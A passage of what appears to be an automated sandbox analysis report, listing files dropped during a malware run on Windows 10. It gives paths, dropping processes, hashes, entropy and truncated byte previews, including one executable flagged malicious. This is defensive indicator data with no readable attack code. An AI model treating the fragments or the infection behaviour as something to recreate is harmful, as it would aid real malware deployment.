Encrypted:	false
SSDEEP:	384:q1hdovTLVktFxU4vQn6rfmg4+0FXT95x6w9/olw8ltuBYJsJ5UtN94qCYEgvC:e0vTLVktvri6IFD98lTk
MD5:	01AF201F0D2FFDF6450C466515E30DF6
SHA1:	238D192E5A8B17D34F2B6A2ECC938CAA2382D407
SHA-256:	991713F940FFB4A1E957DF229A8D05D9BBBD0348CA606C9BD01AE83F38163850
SHA-512:	12BE576445FEB72A6C8B4364843D03C2503CE569CE234AB7DB39EAAF23550F96DE2718DDD61145C45ABBD6B5DE542FF44393F94573ACB61633849DD4FB1BE53D
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... .........Qg........................................nB..........T.......8...........T............3..`R......................................................................................................eJ......p.......GenuineIntel............T.......<.....Qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D32.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8292
Entropy (8bit):	3.697227958350287
Encrypted:	false
SSDEEP:	192:R6l7wVeJnK6x6Y0o6SgmfJ1pr+89baHsfHS+m:R6lXJK6x6Yj6SgmfJ/aMfi
MD5:	30B09F82BBDF3B1BBA0E1D3CC7B97B35
SHA1:	DA585F281EA105B3DA33453769FF20F35D3D1497
SHA-256:	51F04FA67668FD90D52C91FE305C840AB9EE486E4F7DF84D0430B0E905639D51
SHA-512:	BF9C582D82CF5D4F51D9DB184BF71DE3F7DFA46B6894641A3CE0C98886F64C016B47CEF52F255CBFE3183B0E1FABFA11DE3284C6C3273E3DF5FA569B147A4FC4
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.8.5.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D72.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4583
Entropy (8bit):	4.449746188813983
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZlJg77aI9d2nWpW8VYjeYm8M4JcqFE+q8Q8zgEp+wbd:uIjf1I7/b7VCXJ66zgEswbd
MD5:	1194ACBE9B58924255F30ABCC1B7A991
SHA1:	4E5CD38CB3C1183AF2A0D3165DBC1F9955B02168
SHA-256:	1263402DD124010E523A5C448111C5451E3A61C6B32AD747D638B3A675F6E3EC
SHA-512:	4406BDE255BA05FF556FD1E94DE6CDD7BB9AC8922031E5274320A9C0ACC4C1E7B95F615EDCF89477340A708BD78558B03F049F934267B59F0B94C5A027C03BF4
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618215" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D91.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80044
Entropy (8bit):	3.0313448379117163
Encrypted:	false
SSDEEP:	1536:FMC5jVLF4WEzW0gEuxX7aazA+lNF3Ljx+D+IS+d+e+lvz+r+w+LA+O+4B2cMK+82:FMC5jVLF4WEzW0gEuxX7aazA+lNFbjx9
MD5:	98C9C926CA1D1962BF278E658F65415D
SHA1:	8B0B7B5658D0AB88DE50007672E82C45C3FEE579
SHA-256:	5B5DFB138CEC8AFDFDE680DE8A3AA38882D9C111FFC041F6F2B6AA021DFDCDB6
SHA-512:	9C4AF3894815B8170FE7D88739D8378D55C8D9906E2CB94EE4DE3F697010F2866D7757BD832201D6E72296DBDF9AAAB8242F09E04396A869FAA31E45F63DA1DB
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E9C.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.688744396195031
Encrypted:	false
SSDEEP:	96:TiZYWPMFu12VrY8YJW+HgfUYEZuAUtSiOueEYwO5EAQaUcHM1GhI323:2ZDPYrb3NAN5QaUcHM1Ge323
MD5:	2466D16118CD4121DC792E4CCAFC724D
SHA1:	5DC5F3EEC7942D3A37A43D6668C8B0F6CF2CE48F
SHA-256:	3A20A46CF9CBADC8A3E578275106C48A2D830A19439DC7C84A0559E972AD4F0C
SHA-512:	00800A0485B990498602F5967F82EBD0F104C83706B5B221BCDAB4B5BE2A4F1202F6369D9EF87B7ABA586F655142359AC86F70DB50E07BE62629C239CD12BA20
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDBF4.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Dec 5 16:32:19 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	46726
Entropy (8bit):	1.2869960149964732
Encrypted:	false
SSDEEP:	96:5z8L1rB96R67kyp937i7EZAOYTujhP2FXTflDfWIWLNBIgOJol:2ZrB9j9rOEyOAgcFXTflITOY
MD5:	1D3CBAED885223E0AECBB48A49BCE260
SHA1:	0E9025B74072D3CFE19AF7EC61D9833F6662F146
SHA-256:	C1BAA29CC71A8863098988527FD33BFC7056A130A3325DFA9A2923D53325740D
SHA-512:	EA8764B2CA563927D92839FB108B315CD28F900B10CF6CE178863D9EFDB2EACA4DD413AD4765C1D34ADFDD7EF8EC9F447AAB330DF73D177E3C64235F888D5F0D
Malicious:	false
Reputation:	unknown
Preview:	MDMP..a..... .........Qg........................................2!..........T.......8...........T......................................................................................................................eJ..............Lw......................T.......D.....Qg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDC53.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8622
Entropy (8bit):	3.6920008518113203
Encrypted:	false
SSDEEP:	192:R6l7wVeJTpSey6Y+dKDxgmfr57vypD189b+kKfvKm:R6lXJdm6YUKDxgmfrFvN+Zfj
MD5:	8F215A9C72499C2D33CC9816ECD61705
SHA1:	59D25A1A12B9E7D86E56E3191E00D11224BA2A3C
SHA-256:	2ECD921EC005582E697BED032930D5FE27F2389FA12E5E9EDD60206454EDA4B2
SHA-512:	FE361DA15E4F90D8056D7777B37A797648C0CB37A2E64EE293963EFFEF50EAFDCFCB8C0584DAD17658D22733AD15677B9139443D59115D48537B221EA8325C9F
Malicious:	false
Reputation:	unknown
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.4.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCA2.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4853
Entropy (8bit):	4.44368745925604
Encrypted:	false
SSDEEP:	48:cvIwWl8zsZlJg771I9d2nWpW8VYj0NYm8M4Jk5LvM6FBajyq8vU5LvMuaMuxFd:uIjf1I76b7VC0MJcjMTWsjMu1ubd
MD5:	7AF500A99F059DE48AA00FBF865E9D13
SHA1:	CAD4C05D8AB5FB6A53F2D9735473D18D3DB942F2
SHA-256:	A63FAFF8FF7A5C08B1C48E2D2110D045C1EF009FF06D3BC66596FD232E49D0E2
SHA-512:	271B5B39942C53B72FB2A968B57985E177A24A66DD598E9AFB5CAAC9FABC1F35D7888A0A8EA01E7B241E717E4AE8036AD3BACB6874C5E886008F1BB293020949
Malicious:	false
Reputation:	unknown
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="618215" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDD1D.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	78314
Entropy (8bit):	3.0323362411665475
Encrypted:	false
SSDEEP:	1536:q9WjSankzoZTXh7gxCQq/2tk+AiNbFEegbdJCQYYWdwyr0oSS5SZzy:q9WjSankzoZTXh7gxCQq/2tk+AiNbFEE
MD5:	67499E4FF56A455449FA8443E97FF53B
SHA1:	F7886224B0A7173751F8EF4E10FB56618A471D75
SHA-256:	DE323794823ED501A1AE98DADB3B82971507B2366F8E4BC033B5A781DCDEA5EB
SHA-512:	6EEFD5D73D696C97D668E0E5CA08732EE536CE08641C38C5976406EF0C76DBA6FAF608C326E6E8ED91A62147C9D309E8FE4CAD5C9EF8FBAF82439240EEF173D6
Malicious:	false
Reputation:	unknown
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERDE57.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6864909888493336
Encrypted:	false
SSDEEP:	96:TiZYWvmVEp1s5TYSY5Wp9HTUYEZUTtPiDuMEOwKV7RXaojcpMvvZIf23:2ZD+dT1JLeVlaojcpMvvGf23
MD5:	A1635EEEB5F099DC7ED828AF968F639C
SHA1:	E36648F819515B3A9BBB826D26F6E9233C05F3B6
SHA-256:	5F170BDCA370D81696D35785707572FB5A9B7E9950FE0E50837A1798D865E675
SHA-512:	C10C7701F0CD409A9A5BF12A876EC242E65643E4A4D3E96FDBBDF4CD879A33D7CABCBFEB32CB020E21ECED001832B4F6DEE04ECEB82397B5921A95FDEBAD51F8
Malicious:	false
Reputation:	unknown
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\2[1]

Download File

Process:	C:\Windows\sysnldcvmr.exe
File Type:	data
Category:	dropped
Size (bytes):	10496
Entropy (8bit):	7.984469394998947
Encrypted:	false
SSDEEP:	192:aAnkxbr7XNTQwFtSiiFh1eBtpQ9dys4Hcbnvsi3i9FS0swDNC6:aAkxbre0gBFh1xdyCjzWd
MD5:	2266F0AECD351E1B4092E82B941211EA
SHA1:	1DCED8D943494AA2BE39CA28C876F8F736C76EF1
SHA-256:	CBBAD0AB02CD973C9C4E73336E3BCD0849AEB2232A7BDBC38F0B50696B5C28C3
SHA-512:	6691CD697BBE7F7A03D9DE33869AAB289D0A1438B4EE194D2047DED957A726B1D3FE93F08E4A0C677018B20E2521AEB021AB1DC4D1A67927604829DDFD9D59AA
Malicious:	false
Reputation:	unknown
Preview:	..\|.@vC)...q.9....K.{>...d8..'.s.....J.......Pn..k.V.z...@W....L{..uG.'G1.CL..@...<B..6..;.>hM..\..\|w.B.v.....u.g...OX.%. .h.r9:\|....s..<.6.).g..4GlY...2Bf.5...A..+G....(.T-oE..Z.I23.{..'3...)`...^e7jz/M$s......4....*16..m..frn..DD,......Wa(.2.D..9...........x..........Zk4Da...)?.._h...sA..W.....B2.....cHQ.T....=..U...@.3.}....!...Y.G.C...X{... 4"...&..h.0..'xu..#.c.\|g...L0....)...c..M...]....oL{...:En:?.\|_X.P.........Q@. .3...o.....).u..a..[...I...+....f....Z.M..%. ].2.uz._......Gw....t.0b........Fa....MT.d..2.Y....&....T............M..X...P......}..+.....Op..Q.E.o6R;.P..>8`2.'".....~C..Z_.........,.2g.. $..l....."x...:.h;..H...........`.$-6....._-e...C?.6T..=..q...L...3.&fG)..W..G..@6.X~.%X....%R...C.h..?R...]......f...bU!.PH..h...".......R...j,d.k......e..\....~.h..n(.....,.G...<...u.1....6t......l.....w;..p..;y..rSC....._.M....6.X....h..t.G7zs..HP,e_d.d.c.n..^.M+ct\0j.r.>;......_n.q.>.x.e.z...w...o...%kkw..Fg..A/.cS..Q./=cj.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\5[1]

Download File

Process:	C:\Windows\sysnldcvmr.exe
File Type:	data
Category:	dropped
Size (bytes):	66816
Entropy (8bit):	7.997553643285124
Encrypted:	true
SSDEEP:	1536:Ch3BNYZMDlVC0QNs4iNrkJpzrMpZW2Tqv0VwkF:C9YZMDRQNsEJpz52W6P
MD5:	013BC99E3AB2B80A8B0534A68AD914E7
SHA1:	7E47990FC7193BD728D743F03DD0520B81E33CF0
SHA-256:	0033C1687AD7FA0FE0AC08965C13EEE7EDAF5A581182B71FC663E1EBE3B69945
SHA-512:	2F2927A0295A8BF680EC569F314D82AF799CD471CCDA1CDDBFA28B72948388958380A03B68851580044D1A5ED28CFDE58D568A9A125D46BD31C80F8D793238D1
Malicious:	false
Reputation:	unknown
Preview:	Y..P...(.<.4.+MhA.rp.Y3!....n./}.Ch..#8Cj;.........A..S`..K.6.k#.8#_^..W..@_."l(...0....x..$sU.,?C...:........^O..7V....g..#..m.m..R...(u..I.U. ...^.#.....~pg6..g.oq.TH.......[..?sT.7. ..b.WOVJ......CEv....t.S...W(....M-a....Fy}k...f...>.h.+......R...u....1]r...."n.L.j.Le..............Y.!;.rc/...k..{.D....#R.....q.....G......}.57...=.. ....c#X7...o/f....U.3R.yF.U....<....G.T.Y.R..p...L.4....d._.a..,.r.-.E...2../../..&-........W.&].+LK@6H..lOc.......R$p.ZZQ..c.p...1;..b..I.r^.;...~.S....J.,m.....W..wi.jEX6.o57_IcP.mq.....f/.F#..u.=.{7..z..../X5.9..Th..J..(.p....cM.....R.j....s.r.M.4..o^..x.Sd\6i.1....>.z..*...)..mZCk.s.-.....'....k.v..V6?.h....Q.^..j...-...m..+;...<..E.....).r..0....34,.... ..=.R...l....@.O#.6...P._.a.sA\|.?g...}..o k.?.Z...5..nD...8E.%.......\|..QL...>...G .\..@... .#.3....z....a...Y.[.g..0..a.G......i.G.<..E.#..oZR.-...j..]O.. b.\|S..,....Z?..9....C.&].:j...E>..9...0.F]..q.j.(>r..X..n{..v.......^e.}.0$v..7[.%.R.."..L...E...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\rh[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1171111125.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	449536
Entropy (8bit):	6.408263129357923
Encrypted:	false
SSDEEP:	12288:1O7k28xC7HMDVBjfbL5S6IZ7OGQN/RutyU3ivG/Vt9:+OS6IZ7QN/R8yoaG/P
MD5:	BD0CAD52FD3A6537CC7AF21852619340
SHA1:	7831109E87D28DA448E5DDC8FA63A3E9750086D3
SHA-256:	E58B1261B10B7340A80DB815A8E4A7C9A4FD1C0F29101D1A148104D9E70165FA
SHA-512:	08F414ABDDDC0CA9CDC2E9D5FA796273B4E85FDD8EDF49ABC3F61E958DE6E20F3F3E94983301EAAA5D46C806CB0B424498B2F21418FDBF67209CEFDCEDDEA09B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........z...)...)...)...(...)...(...)...(...)...(...)...(...)...(...)...(...)...)..)...)...).9.(...).9.)...).9.(...)Rich...)........................PE..L..._{_d...............%.\|...f....................@.......................................@..................................y..(................................"..@n...............................m..@............................................text...C{.......\|.................. ..`.textbss.................................rdata..............................@..@.data....;.......2...p..............@....rsrc...............................@..@.reloc...".......$..................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\3[1]

Download File

Process:	C:\Windows\sysnldcvmr.exe
File Type:	data
Category:	dropped
Size (bytes):	55040
Entropy (8bit):	7.996397661959263
Encrypted:	true
SSDEEP:	1536:xaaMLpm+OPoZJ+D2W/1RbD1Q3a6vCUy4DPHz:M2HPorkRbhaoYDPHz
MD5:	127C985E994E51D949C479988AAEBD95
SHA1:	1C515DAEE4C8874A48EC0AB167CCBD1B6C3476F3
SHA-256:	7E32E80A13D3290119514A952908DA4A512A26F75332C6ECAB18027B5F68D5B6
SHA-512:	F473FAD8F182609289F02ED4D09E9D79AC77DED8EDAC5DBB258EEAA62EE79AE86D7FCDB68D3B4912B2EBFA4F34C46CC806E89AE1D15F7B366466E7F76A402E44
Malicious:	false
Reputation:	unknown
Preview:	qU.h.x^..w..j.4.YT.....V\...'I`#..X...L.}...4..\<.NU.......;F.X..W"..k..3?......d..P...........1}..1U....&...i.3.......c<..SaX...@w._#...H...qO\..-.1" \|.%L.B\|}.r.s......F.....[.6.....:.~..,TE.0.>...X..<z..~.],....i..)-#.O.a.....K.3I.E.b...\].....0....o.q.i....."K3.........k.......>.Q..y....k.!..1..d.<U...n.G.4v?@.o..o....p?.....t.... Q@..>..V....e.Gy.6-..:.......p~...w..!:.z..q.<..\|T.w.X.....?F.q.)3Pr......\|.\.j.FC4.w....a\|zk..9...e.T...G$.IF....x.P.!...+(.W.j...v..........2G...6;a.x.n.....M....d<.?.I...A....0!..[.e.L...Q...'J..u.....$...%6b.$..V.".2..y.....v.R.....Kb.P..U..H.!...@....u.....Q...+Z...p..........,j.%..nf.]k..1'+\|~...z0.g[.:e......2?.z...O....._.......X....8I..h...v.eZ...9:.iO.S.gl.y{.`bx6.R.-bHWhgF[.oDz....z....6....8l.t.y<.......}D.u..56.T;.,.{.stY.Z.L.1."!h.J.y.^c...q.V.N.WAy<I7......fo-.).m../...$.f.55.....KqQc.....hA.......ZM.,....v..@O$j. 